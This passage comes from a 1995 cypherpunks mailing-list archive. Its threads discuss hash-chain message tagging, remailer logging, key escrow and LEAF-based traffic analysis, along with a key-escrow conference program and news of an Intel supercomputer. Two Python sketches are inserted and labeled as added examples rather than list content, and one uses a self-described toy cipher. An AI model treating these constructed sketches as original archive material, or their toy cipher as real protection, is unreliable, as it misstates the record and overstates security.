iQCVAwUBMFCbU6DthkLkvrK9AQExWwQAoXSQ+6rL2tLf61F1Zj7fX6gO4ZZOaASZ
O5v0aDN1LXttmv+YUslMU8B1mpKexVk5FZDBMJ2MkonDssi5kcNNhUKc911x7zyh
oLh1I8lA4RPKdrxY7AuRF+GQpOmHFpb6FK18Aq+EkiJX5mmKpCANY8tYqcpiZ4o7
GHt0DVuKhaE=
=uQD0
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 8 Sep 95 15:39:46 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: Slightly faster checking for encrypted messages to me
Message-ID: <199509082239.PAA20047@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:31 AM 9/5/95 -0800, Doug Barnes wrote to Hal and us:

>If two entities want to communicate via a message pool,
>without worrying about traffic analysis, but don't want
>the overhead of trying to decrypt every headerless
>message to the pool, then they can do the following:
>
>1) In a "headered" message, one of the entities (A) sends
>   a collection of large random numbers to be used as return
>   markers, encrypted with the public key of the desired
>   correspondent (B).
>
>2) B can then respond to A with an essentially headerless
>   message prefixed with one of the numbers sent by A.
>   This initial message should contain a list of similar
>   numbers for B, that A can use to send messages to B.

There's a way to get this without sending as much data -
using a relative of S/Key (probably not affected by S/Key patent.)
A sends B two random numbers, thing1 and thing2.
B's headers include a prefix of
        n, hash( thing2, hash^n(thing1) )
where hash^n is n rounds of hash, e.g. MD4 or MD5.
Thing2 can possibly be a well-known string instead.  
Assuming there's no special relationship between thing2 and 
the hash function, it should be hard to derive 
        hash( thing2, hash^n(thing1) ) 
from 
        hash( thing2, hash^(n-1)(thing1) )
presumably as hard as inverting the hash.  
(Brute-force is an option if thing1 is not chosen well, 
involving a few hundred hashes on a few million popular wimpy passwords,
but S/Key suffers from the same weakness.)

Including n in the header is a mild message-correlation risk, 
though messages don't have to be sent with consecutive n's 
(at a cost of more runs of hash per message.)  This lets you recover
easily from lost messages.  There's also the mild risk that the
thing1 and thing2 keys need to be stored, though Doug's method
also suffers from that.

It is also possible to use S/Key itself - the original message
from B to A contains Xn = hash^n(key) and maybe n.  
The next message contains Xn-1 = hash^(n-1)(key), which A checks by 
hashing it and looking in his table of messageids for Xn.
A can recover from small numbers of lost messages by hashing a few times.
(Since you're not using it for authentication, is it covered by
the S/Key patent?)

This method has the weakness that Traffic Analysts can also
correlate messages by hashing the fields and comparing with previous.
One workaround is for B to also send A the keys for some simple
encryption method E such as "Ek = m xor k" and use Xn = Ek(hash^n(key)).
This requires A to perform an xor and a hash for each correspondent
(B, C, D, ...), but is probably secure enough.  Alternatively,
since the numbers are fairly short, you can use "Ek = m^k mod p",
but that's starting to look like work :-).



#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
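
Added example, not part of the message above and not code from the list: a Python sketch of the two tagging schemes the message describes, the prefix `n, hash(thing2, hash^n(thing1))` and the plain S/Key-style chain, showing the recipient's lookup and the correlation weakness the message notes for the plain chain. SHA-256 stands in for MD4/MD5; `PoolReader`, `MAX_N`, the replay set and all sample values are assumptions made for illustration.

```python
import hashlib
import hmac

MAX_N = 10_000  # assumed cap so a hostile header cannot demand unbounded hashing

# Constructed sample secrets (fixed for repeatability; real ones would be random).
THING1 = b"constructed-sample-thing1-0000001"
THING2 = b"constructed-sample-thing2-0000002"
KEY = b"constructed-sample-skey-seed-0003"


def H(data: bytes) -> bytes:
    """One round of the hash (SHA-256 here, in place of MD4/MD5)."""
    return hashlib.sha256(data).digest()


def hash_n(seed: bytes, n: int) -> bytes:
    """hash^n(seed): n rounds of the hash."""
    value = seed
    for _ in range(n):
        value = H(value)
    return value


def prefix_tag(thing1: bytes, thing2: bytes, n: int) -> bytes:
    """The prefix value hash(thing2, hash^n(thing1)), with thing2 of fixed length."""
    return H(thing2 + hash_n(thing1, n))


class PoolReader:
    """Recipient side: decide which pool messages are worth trying to decrypt."""

    def __init__(self):
        self.peers = {}    # name -> (thing1, thing2)
        self.seen = set()  # (name, n) pairs already accepted, to drop replays

    def add_peer(self, name, thing1, thing2):
        self.peers[name] = (thing1, thing2)

    def match(self, n, tag):
        """Return the peer name if header (n, tag) is from a known peer, else None."""
        if not 0 < n <= MAX_N:
            return None
        for name, (thing1, thing2) in self.peers.items():
            if hmac.compare_digest(prefix_tag(thing1, thing2, n), tag):
                if (name, n) in self.seen:
                    return None  # same header seen before: treat as a replay
                self.seen.add((name, n))
                return name
        return None


def skey_ids(key: bytes, count: int):
    """Plain S/Key-style message ids in sending order: X_count, ..., X_1."""
    return [hash_n(key, n) for n in range(count, 0, -1)]


def observer_links(ids):
    """What an outside observer can correlate: pairs (earlier, later)
    of positions where hashing the later id yields the earlier one."""
    position = {value: i for i, value in enumerate(ids)}
    links = []
    for later, value in enumerate(ids):
        earlier = position.get(H(value))
        if earlier is not None and earlier < later:
            links.append((earlier, later))
    return links


if __name__ == "__main__":
    reader = PoolReader()
    reader.add_peer("B", THING1, THING2)
    # Non-consecutive n values still match, so lost messages do no harm.
    for n in (7, 3, 7):
        print(n, reader.match(n, prefix_tag(THING1, THING2, n)))
    # Plain chain ids are linkable by anyone; keyed prefix tags are not.
    print(observer_links(skey_ids(KEY, 4)))
    print(observer_links([prefix_tag(THING1, THING2, n) for n in (4, 3, 2, 1)]))
```

The recipient's cost is n hash rounds per known correspondent per pool message, which is why `n` is bounded before any hashing is done.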





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 8 Sep 95 15:40:14 PDT
To: Jeff Simmons <jsimmons@goblin.punk.net>
Subject: Re: University logging mail to anon.penet
Message-ID: <199509082239.PAA20081@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:30 PM 9/6/95 -0700, you wrote:
>Our local University apparently has been logging ALL mail to anon.penet,
>including faculty, students, and off-campus users.

Any time you're using non-encrypted remailers, you've got no protection
against people doing that; even with encrypted messages they can still
tell who's sending mail to anon.penet.fi, but can't tell who the messages
are forwarded to.

There may be ECPA issues involved, especially if CalPolySLO is a government-
run university; the sysadmins certainly need to learn some ethics...
If your ombudsperson can be reached by email, a note through anon.penet.fi
explaining the usefulness of anonymous remailers for sensitive communications
might be educational.  After all, it's a technique they might want to use
for handling sexual harassment cases or other problems requiring two-way
communications.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (Ted Byfield)
Date: Fri, 8 Sep 95 12:45:46 PDT
To: cypherpunks@toad.com
Subject: Re: Car rentals, Driver's Licenses, Ecash, & Net Access
Message-ID: <v02120d00ac76137192e3@[166.84.253.144]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:21 PM 9/8/95, Duncan Frissell wrote a very interesting disquisition:

 <snip>
>An attempted cartel of that sort --- one that tries to enlist the billion or
>so people who will be easily and reliably switching funds within a few years
>--- is doomed to failure.  Too many potential 'cheaters.'  Too much money to
>be made by breaking with the cartel and offering financial services to
>others who wish to use them.
 <snip>

        One question: Most of your remarks (and you're in no way alone in
this regard) seem to assume that uniformity is a sine qua non of law
enforcement (as opposed, say, to selective enforcement). Correct me if I'm
wrong.
        I wonder, though, whether this is so; isn't it true that the
impossibility of consistent enforcement may well encourage a systemically
selective enforcement (maybe shaped by this or that, one's politics, for
example)? Presumably, then, law enforcement would take on an increasingly
"terroristic" character--"random," as IRS audits and the like can be.
        Some recent high-profile cases (Packwood, and Kenneth Starr's
efforts to indict Gov. Tucker) might indicate the shape that enforcement
could take, especially in light of some recent congressional legislative
efforts: the gov't investigates you regarding X, in the process of the
investigation turns up Y and Z, and thus finds reason maybe to look into A,
B, and C as well--in effect, turning your life into a nightmare.
        But I digress: The main point, really, is that enforcement doesn't
need to be nonselective to be "effective." I think this holds whether I
understood your remarks correctly or not.

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kqb@whscad1.att.com (Kevin Q Brown +1 201 386 7344)
Date: Fri, 8 Sep 95 15:47:10 PDT
To: cypherpunks@toad.com
Subject: GAK Hacks and Position Surveillance
Message-ID: <9509082244.AA12403@ig1.att.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> GAK Hacks!
> We did it for SSL, let's do it for GAK.
> Demonstrate that superencryption (encrypting within a GAK wrapper) defeats
> GAK. And other kinds of hacks, including releasing "damaged" (inoperative)
> versions of the proposed code (when it becomes available).

Tim,
That's a start.  Superencryption can protect the _content_ of the
conversation, but it will not prevent _traffic analysis_.  That is
an important issue because, as I explain below, in our increasingly
wired world, effective traffic analysis may become a _position_
escrow system, except that there won't even be any escrow.

A GAK Hack that combines superencryption with a method to defeat traffic
analysis would raise a lot more eyebrows than superencryption alone.
Unfortunately, since we don't yet know what kind of LEAFs will be in
the next-generation GAK proposal, I can only refer to some comments
made awhile ago about Clipper-based traffic analysis:

  Date: Mon, 14 Mar 94 10:36:05 EST
  From: smb@research.att.com
  > The LEAF can be decrypted with just the family key; from what's been
  > disclosed so far, local law enforcement agents will be able to do that
  > without contacting the escrow sites.  The LEAF contains the unit id of
  > the chip, independent of what phone number it's being used from, ...

Imagine someone using a GAK/LEAF communication device while travelling
throughout the day.  Especially if the communications are wireless,
no court order will be needed to track position during his/her journeys
because a packet sniffer armed with the family key could detect any
of his/her communications automatically.  You may wonder "what packet
sniffer could track communications like that"?  Maybe I'm wrong, but
isn't that what the recent Digital Telephony legislation was for?

Now let's return to a recent message from tcmay@got.net:
> The pernicious nature of the "escrow" idea, ... is that it says that
> surveillance is not so bad after all, because the results of the escrow
> will not be looked at except when "justified." ...

Or perhaps, once a GAK system with some kind of LEAFs is in place,
no justification at all will be needed to accomplish efficient and
fully automated massive position surveillance.  Maybe key escrow is
just a red herring to distract us from position surveillance?
Of course, we can assume that these LEAFs will not be as vulnerable
to forging as Matt Blaze demonstrated for Clipper (Tessera?).

First we had:
  GAK = Government Access to Keys.
Perhaps now we have:
  GULPS = Government Unlimited License for Position Surveillance?

Frankly, I wouldn't be surprised if I have overstated the threat
and more technically knowledgeable minds on this list will expose
the flaws in my reasoning.  Please do.

                              Kevin Q. Brown
                              kevin.q.brown@att.com
                              kqb@whscad1.wh.att.com
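
The argument in the message above, worked through as an added example (not part of the original post and not taken from any Clipper specification): superencryption keeps the content from an escrow holder, while anyone with only the family key can still read the unit ID from every LEAF and link sightings into a trail. The cipher is a toy hash-based XOR stream standing in for Skipjack, and the LEAF layout, keys, unit IDs and cell names are constructed assumptions.

```python
import hashlib
import os
import struct
from collections import defaultdict

# Constructed value: one key shared by every device and every observer box.
FAMILY_KEY = b"constructed-family-key"


def toy_cipher(key: bytes, iv: bytes, data: bytes) -> bytes:
    """XOR with a SHA-256 counter keystream; the same call encrypts and decrypts.
    A stand-in for the real cipher, for illustration only."""
    stream = b""
    counter = 0
    while len(stream) < len(data):
        stream += hashlib.sha256(key + iv + struct.pack(">I", counter)).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


def make_leaf(family_key, unit_id, unit_key, session_key, iv):
    """Assumed layout: 32-bit unit ID | 80-bit session key wrapped under the
    unit key | 16-bit checksum, the whole field encrypted under the family key."""
    wrapped = toy_cipher(unit_key, iv, session_key)
    check = hashlib.sha256(session_key + iv).digest()[:2]
    inner = struct.pack(">I", unit_id) + wrapped + check
    return toy_cipher(family_key, iv, inner)


def open_leaf(family_key, iv, leaf):
    """What a family-key holder learns: the unit ID, plus a session key that is
    still wrapped under the escrowed unit key."""
    inner = toy_cipher(family_key, iv, leaf)
    (unit_id,) = struct.unpack(">I", inner[:4])
    return unit_id, inner[4:14]


def send(device, message, private_key, location):
    """One transmission: the user's own encryption inside the escrowed layer."""
    iv = os.urandom(8)
    session_key = os.urandom(10)
    inner_ct = toy_cipher(private_key, iv, message)    # superencryption layer
    outer_ct = toy_cipher(session_key, iv, inner_ct)   # escrowed (GAK) layer
    leaf = make_leaf(FAMILY_KEY, device["unit_id"], device["unit_key"],
                     session_key, iv)
    return {"location": location, "iv": iv, "leaf": leaf, "ciphertext": outer_ct}


def escrow_decrypt(packet, unit_key):
    """Full escrow access (family key plus unit key) strips only the outer layer."""
    _, wrapped = open_leaf(FAMILY_KEY, packet["iv"], packet["leaf"])
    session_key = toy_cipher(unit_key, packet["iv"], wrapped)
    return toy_cipher(session_key, packet["iv"], packet["ciphertext"])


def track(packets, family_key):
    """Passive observer with only the family key: unit ID -> ordered locations."""
    trail = defaultdict(list)
    for p in packets:
        unit_id, _ = open_leaf(family_key, p["iv"], p["leaf"])
        trail[unit_id].append(p["location"])
    return dict(trail)


# Constructed sample devices and traffic.
ALICE = {"unit_id": 0x00C0FFEE, "unit_key": os.urandom(10)}
BOB = {"unit_id": 0x0BADCAFE, "unit_key": os.urandom(10)}


def demo():
    packets = [
        send(ALICE, b"meet at noon", b"alice-private", "cell-A"),
        send(BOB, b"hello", b"bob-private", "cell-A"),
        send(ALICE, b"running late", b"alice-private", "cell-B"),
        send(ALICE, b"arrived", b"alice-private", "cell-C"),
    ]
    return packets, track(packets, FAMILY_KEY)


if __name__ == "__main__":
    packets, trail = demo()
    for unit_id, places in trail.items():
        print(f"unit {unit_id:08X}: {' -> '.join(places)}")
    print("escrow view of first message:", escrow_decrypt(packets[0], ALICE["unit_key"]))
```

The LEAF bytes differ on every transmission, so the sightings are linkable only to a party holding the family key; for that party no unit key, escrow agent or court order enters the picture.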




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 8 Sep 95 16:34:28 PDT
To: cypherpunks@toad.com
Subject: Re: ON OFF-TOPIC   [NOISE]
Message-ID: <199509082334.QAA16208@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain



>Is there something authoritarians want, that we don't mind them having,
>for which crypto would be an enabling technology?  Some of them _might_
>be interested in having better encryption for TV channels so that kids
>can't watch a NotForKids channel (though many of them might rather ban
>it outright) or so they can easily control whether their kids get to
>watch MTV even though the V-Chip doesn't have a NoisyKidsMusic bit.
>Perhaps they'd enjoy having reputation systems available, so they can
>easily filter out politically incorrect material, or do a thumbs-down
>on things they disapprove of, or let the Baptists and Catholics and
>Anti-Baptists all have their own convenient ratings.

MTV has a pretty funny parody of the V-chip concept that they have run on
occasion.  They are advertising that kids should get the MTV-chip which
prevents parents from watching MTV while the kids are at school.  Their
slogan is "keep mind control at home where it belongs".

(I find it interesting that they have an anti-censorship stance, yet censor
many of their videos.  Kind of hypocritical...)

|  Minister of Forced Caffinization in the DNRC   | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites    | Disclaimer:          |
|all mankind free in one-key-stenography-privacy!"| Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: keelings@wu1.wl.aecl.ca (S. Keeling)
Date: Fri, 8 Sep 95 14:35:20 PDT
To: cypherpunks@toad.com
Subject: Re: ECPA (Was: University logging mail to anon.penet.fi)
Message-ID: <9509082134.AA19037@wu1.wl.aecl.ca>
MIME-Version: 1.0
Content-Type: text/plain


Incoming from Jim Ray:
> "Josh M. Osborne" <stripes@va.pubnix.com> writes:
> 
> >down somewhat, in a very libertarian society you might be able to
> >run a profitable ISP selling to the very niche market of people who
> >want to threaten, harass, or generally make a nuisance of themselves).
> 
> As the list's designated "very libertarian" advocate, I must object.
> Here is what you must sign to become a member of the Libertarian Party:

	And here, I must object (sorry Perry; I'll be brief).

	Whatever do the workings of an hypothetical "libertarian"
society have to do with the "Libertarian Party"?  Certainly, it would
be nice if the latter were working towards the former, but the two are
not the same.

	I know of quite a few `l'ibertarians who strongly object to
the `L'ibertarian Party pledge.

-- 

 "Remember, obsolescence (Win95) isn't an accident;  it's an art form!" 
   keelings@wu1.wl.aecl.ca       s. keeling,   aecl - whiteshell labs



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 8 Sep 95 07:35:28 PDT
To: cypherpunks@toad.com
Subject: Cryptography Global Challenges
Message-ID: <199509081435.QAA06954@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



International Cryptography Institute 1995


Global Challenges


Thursday-Friday September 21-22, 1995


Presented by
The National Intellectual Property Law Institute
1815 Pennsylvania Ave., N.W.
Washington, D.C. 20006
202-842-4800
Fax: (202) 296-4098


President James P. Chandler Emeritus Professor of Law

_______________________________________________________


The International Cryptography Institute will address the
cryptography challenges associated with meeting the
information protection needs of users and the law
enforcement and national security needs of nations.
Topics to be covered include national and international
cryptography policies and regulations, international
requirements and approaches, commercial cryptography,
privacy and trust, key escrow encryption, business
requirements, law enforcement requirements, and the use
of cryptography with electronic payments.

_______________________________________________________

Keynote Speaker

FBI Director Louis J. Freeh

_______________________________________________________


Program


September 21, 1995


8:30-9:00     Welcome and Opening Remarks

              James Chandler, President, National
              Intellectual Property Law Institute

              Dorothy E. Denning, Chair of Program

              David Kahn, Visiting Historian, National
              Security Agency, U. S.


9:00-9:40     Cryptography in Business

              M. Blake Greenlee, U.S.


9:40-10:20    Commercial Use of Cryptography

              Nick Mansfield, Shell International, The
              Netherlands


10:20-10:50   Break


10:50-11:20   Computer Industry Position on Privacy and
              Trust in an Information Society

              Yves Le Roux, Digital Equipment
              Corporation, France


11:20-12:00   The International Cryptography Experiment
              and Worldwide Cryptographic Products
              Survey

              David Balenson, Trusted Information
              Systems, Inc., U.S.


12:00-12:30   Export Controls on Encryption Software

              Ira Rubinstein, Microsoft Corp., U.S.


12:30-2:00    Lunch with Keynote

              Louis J. Freeh, Director, Federal Bureau
              of Investigation


2:00-3:00     Cryptography and the Information Society:
              Recent Developments in the European Union

              David J. Gould, Cabinet Office, UK


3:00-3:30     Encryption Policy and Technology in Japan

              Mitsuru Iwamura, The Bank of Japan, Japan


3:30-3:50     Break


3:50-4:30     Towards an Australian Policy on Encryption

              Peter Ford, Attorney General's Department,
              Australia


4:30-5:00     New National Encryption Policies and
              Regulations in Russia

              Anatoly Lebedev, LAN Crypto Ltd., Russia


5:00-6:00     International Regulation of Cryptography:
              An Update

              James Chandler, National Intellectual
              Property Law Institute, U.S.


5:30-6:30     Reception

_______________________________________________________


September 22


8:30-9:20     U.S. Government Cryptography Policy

              Michael R. Nelson, Office of Science and
              Technology Policy, U.S.

              Ronald D. Lee, National Security Agency,
              U.S.


9:20-10:10    Law Enforcement Requirements for
              Encryption

              William E. Baugh, Jr., Edward L. Allen,
              Michael D. Gilmore, Federal Bureau of
              Investigation, U.S.


10:10-10:40   Break


10:40-11:20   International Key Escrow Encryption

              Dorothy E. Denning, Georgetown University,
              U.S.


11:20-12:00   Transnational Key Escrow

              Henry H. Perritt, Jr., Villanova
              University School of Law, U.S.


12:00-1:30    Lunch


1:30-3:00     Commercial and International Key Escrow

              Stewart A. Baker, Steptoe & Johnson, U.S.,
              moderator

              Stephen T. Walker, Trusted Information
              Systems, Inc., U.S.

              Frank Sudia, Bankers Trust Company, U.S.

              Carmi Gressel and Itai Dror
              Fortress U & T Ltd., Israel


3:00-3:20     Break


3:20-4:00     Billing and Paying Over the Internet

              Dan Schutzer, Citibank, U.S.

_______________________________________________________


Faculty


Faculty Chair
Dr Dorothy Denning


Mr. Edward L. Allen
Supervisory Special Agent
Federal Bureau of Investigation


Mr. Stewart Abercrombie Baker
Partner
Steptoe & Johnson


Mr. David Balenson
Senior Computer Scientist
Trusted Information Systems, Inc.


Mr. William E. Baugh, Jr.
Assistant Director,
Information Resources Division


Dr. Ernest F. Brickell
Vice President
Bankers Trust Electronic Commerce
c/o Sandia National Labs Applied Math Dept.


Prof. James Chandler
President
National Intellectual Property Law Institute


Dr. Dorothy E. Denning
Professor
Computer Science Department
Georgetown University


Mr. Peter Ford
First Assistant Secretary, Security Division
Attorney General's Department
Australia


Mr. Louis J. Freeh, Director
Federal Bureau of Investigation


Mr. Michael D. Gilmore
Supervisory Special Agent
Federal Bureau of Investigation
Engineering Research Facility


Mr. David J. Gould
Under Secretary of State
Overseas and Defence Secretariat
Cabinet Office, London


Mr. M. Blake Greenlee
M. Blake Greenlee Associates, Ltd.


Dr. Carmi Gressel
Engineering Manager
Fortress U & T, Ltd.
Israel


Mr. David Kahn
Visiting Historian
National Security Agency,
and author, "The Codebreakers"


Dr. Anatoly Lebedev
President
LAN Crypto, Ltd.
Russia


Mr. Mitsuru Iwamura
Chief Manager
Institute for Monetary and Economic Studies
The Bank of Japan


Mr. Ronald D. Lee
General Counsel
National Security Agency


Mr. Yves Le Roux
Central Engineering, Security Program
Digital Equipment Corp.
France


Mr. Nick Mansfield
Shell International Petroleum Maatschappij B.V.
The Hague
The Netherlands


Mr. Michael R. Nelson
Special Assistant, Information Technology
White House Office of Science and Technology Policy
Old Executive Office Building, Washington DC 20506


Mr. Henry H. Perritt, Jr.
Professor of Law
Villanova University School of Law
Villanova, PA 19085


Mr. Ira Rubinstein
Senior Corporate Attorney
Microsoft Corp
Redmond, WA 98052


Dr. Dan Schutzer
Vice President
Citibank


Dr. Frank Sudia
Vice President
BT Electronics Commerce
Bankers Trust Co., New York


Mr. Stephen T. Walker
President
Trusted Information Systems, Inc.

_______________________________________________________


Location and Fees


ICI '95 will be held at the National Intellectual
Property Law Institute, 1815 Pennsylvania Ave.,
Washington, DC, third floor.


Registration is $695 before September 1 and $795
thereafter ($395/495 for U.S. Government). Payment
includes all conference materials, two lunches, and a
cocktail reception.


Cancellations Fees: All registration is subject to a $50
fee. Tuition will not be refunded if notice of
cancellation is received after September 1, 1995, but a
substitute attendee may be sent. Postmarks will not be
considered in determining timeliness of receipt.


Hotel Accommodations: A limited block of rooms has been
reserved at the Wyndham Bristol. However, registrants must
make their own hotel reservations and indicate that they
are attending the International Cryptography Institute
1995. Room reservations may be made by calling or writing
the Wyndham Bristol Hotel, 2430 Pennsylvania Ave., N.W.
Washington, D.C. 20006 (202) 955-6000.


CLE Credit: CLE credit in mandatory states will be
applied for as requested.

_______________________________________________________


Course Registration Form

Name: 
Organization: 
Address:


Phone:


Fee:                    General            U.S. Gov't

Before 9/1/95           $695               $395
After 9/1/95            $795               $495


Payment (check one) Check payable to The National
Intellectual Property Law Institute


_______ Master Card           ________VISA

Card #
Expiration Date:
Signature:


Registration by Fax: 800-304-MIND  Phone:  800-301-MIND 
                     202-296 4098          202-842-48000


Mail Registration with payment to:
The National Intellectual Property Law Institute
1815 Pennsylvania Ave., NW, Suite 300
Washington, DC 20006

_______________________________________________________












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ford Prefect <remailer@bi-node.zerberus.de>
Date: Fri, 8 Sep 95 08:14:53 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <m0sr58K-0002HMC@bi-node.zerberus.de>
MIME-Version: 1.0
Content-Type: text/plain


NY Times, Sept 8, 1995.


Intel Wins Contract to Develop World's Fastest
Supercomputer

By Lawrence M. Fisher


San Francisco, Sept. 7 -- The Intel Corporation said
today that it had won a contract from the Department of
Energy to develop what it called the world's fastest
supercomputer.


The machine, to be built at an estimated cost of $45
million, would use 9,000 of Intel's forthcoming P6
microprocessors linked in a configuration known as
massively parallel. In recent years, massively parallel
computers using thousands of relatively inexpensive
off-the-shelf chips have stolen the performance lead from
traditional supercomputers like those made famous by Cray
Research Inc., which use far fewer, but far more powerful
processors.


Intel said its new supercomputer would be the first to
achieve the goal of calculating more than a trillion
floating-point operations a second, known as a teraflop.
The machine, to be kept at Sandia National Laboratories
in Albuquerque, N.M., would be used by Department of
Energy scientists to study a variety of complex problems,
foremost among them nuclear weapons safety.


"President Clinton is committed to ending underground
nuclear testing," Victor Reis, Assistant Secretary for
Energy Programs, said in a statement. "Computer
simulation will be a principal means for insuring the
safety, reliability and effectiveness of the U.S. nuclear
deterrent. We are embarking on a 10-year program to
advance the state of high performance computing to meet
national security objectives," he said. ...


------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 8 Sep 95 14:35:52 PDT
To: cypherpunks@toad.com
Subject: 9K P6
Message-ID: <199509082135.RAA26681@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


There's a bit more on Intel's supercomp virtual NW tester at:


     URL: http://www.ssd.intel.com/press/asci1.html
  

Here's a sample:

----------

Intel Scalable Systems Division

   
   Fortunately, advances in computer hardware and software technologies
   are making computer-based virtual weapons testing and prototyping a
   viable and affordable alternative to the traditional nuclear and
   non-nuclear testing of stockpile stewardship. The Intel teraflop
   computer announced today is a key milestone in the shift from nuclear
   testing to computer-simulated testing.


  The ASCI Program

   Located within the DOE's Defense Programs (DP) laboratories, the U.S.
   Department of Energy's Accelerated Strategic Computing Initiative
   (ASCI) is a multi-year program to extend DOE's computational resources
   to support virtual testing and prototyping capabilities for nuclear
   weapons. ...

   ASCI has four objectives, each of which requires computational
   capabilities that are beyond the capabilities of existing systems:

     * Performance -- Create credible virtual tests to analyze the
       performance and predict the behavior of nuclear weapons.

     * Safety -- Predict the behavior of full weapons systems in complex
       accident scenarios.

     * Reliability -- Develop the ability to make predictions that will
       extend the lifetime of current weapons, predict failure mechanisms
       and reduce routine maintenance requirements.

     * Renewal -- Use virtual prototyping to reduce production and
       testing facilities for stockpile requalification and replacement
       work. ...


   Beyond its weapons safety impact, the teraflop computer will have a
   wide range of other applications -- from developing safer, more
   efficient cars to simulating natural disasters in real-time to finding
   new drugs to fight disease. The machine will be one of the world's
   foremost scientific research tools and will act as a magnet for
   advanced research projects.


   In 1963, John Kennedy referred to a test ban treaty as a shaft of
   light cut into the darkness of the Cold War -- a chance to step back
   from the shadows of war. Today, by making it possible to ensure the
   safety, reliability, and performance of the weapons stockpile while
   foregoing nuclear testing, the Intel/Sandia teraflop computer can help
   the world take a further step back from the shadows of war into the
   light of peace.
   






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 8 Sep 95 14:44:11 PDT
To: cman@communities.com
Subject: Re: GAK
In-Reply-To: <199509082005.NAA22461@comsec.com>
Message-ID: <9509082139.AA09726@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Thu, 7 Sep 1995 13:09:03 -0800
>From: cman@communities.com (Douglas Barnes)
>
>One good (non-cypherpunk) argument against GAK is that it
>concentrates a very large quantity of valuable keys in a few
>places, where they become an extremely attractive target for
>government or corporate espionage.

[...]


>Note that a few million keys would fit very easily on even a
>low-end DAT tape (easily hidden in a pack of cigarettes).

The same danger happens with the TIS DRC (see the company web page), even
though there is no key escrow in the TIS system.  Instead, the emergency
access field (Data Recovery Field (DRF)) is stored with the file -- but the
key which encrypts it is the public key of the Data Recovery Center (DRC).

If too much attractive stuff is available by loss of any one public key,
that key gets attacked.  To compensate for this, the TIS DRC generates new
public keys periodically to give out to new (or old) customers.

However, a government warrant which demands the DRC's private key collection
would gain quite a harvest.

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme/home.html|
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Fri, 8 Sep 95 18:00:00 PDT
To: Carl Ellison <cme@TIS.COM>
Subject: Re: GAK
Message-ID: <v02120d22ac76a26200fa@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



>
>If too much attractive stuff is available by loss of any one public key,
>that key gets attacked.  To compensate for this, the TIS DRC generates new
>public keys periodically to give out to new (or old) customers.
>
>However, a government warrant which demands the DRC's private key collection
>would gain quite a harvest.

The economics of the situation seem to dictate that whether you have
one key or N keys, it's going to be cheaper to subvert the escrow agent
(you guys or whoever) than it is to brute-force even one key. Therefore
I'm not clear on how using multiple keys buys you much against the most
probable threat -- opponents getting physical access to keys or the
subversion of personnel who have legitimate access.

Of course, it's still a good policy, reducing the payoff to those too
timid to try the direct approach. But I think this threat is significantly
less likely than a disgruntled employee selling the DRC private
keys on a real instantiation of the Blacknet model, without even being
solicited.

You may feel very comfortable with the personnel and procedures you
have in place now, but auditing and vetting systems are notorious
for scaling very, very poorly. You may feel you can vouch for the
trustworthiness of everyone at TIS now, but this sort of familiarity
also scales very poorly. And clearly, were this to become commercially
significant, it would need to scale quite a bit.

Douglas Barnes
Electric Communities






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard P. Klau" <KLAURICH@uofrlaw.urich.edu>
Date: Fri, 8 Sep 95 15:00:50 PDT
To: cypherpunks@toad.com
Subject: Re: Privacy book list
Message-ID: <2A82FB42074@UOFRLAW.URICH.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> I got a letter in the mail today from Plenum Publishing Corp in NY,
> advertising a book called _Mind Your Own Business: The Battle for
> Personal Privacy_ by Gini Graham Scott.  It seems I am on a
> mailing list for privacy freaks.  Oh the irony!
> 
> They must have gotten my name from somewhere.  The only two sources that
> I can think of are the lists for CFP '94 and '95, and a
> revolver club that I used to be a member of.  Has anyone else on the 
> list gotten this ad? 

I got the ad (and a subsequent review copy, upon request) after we 
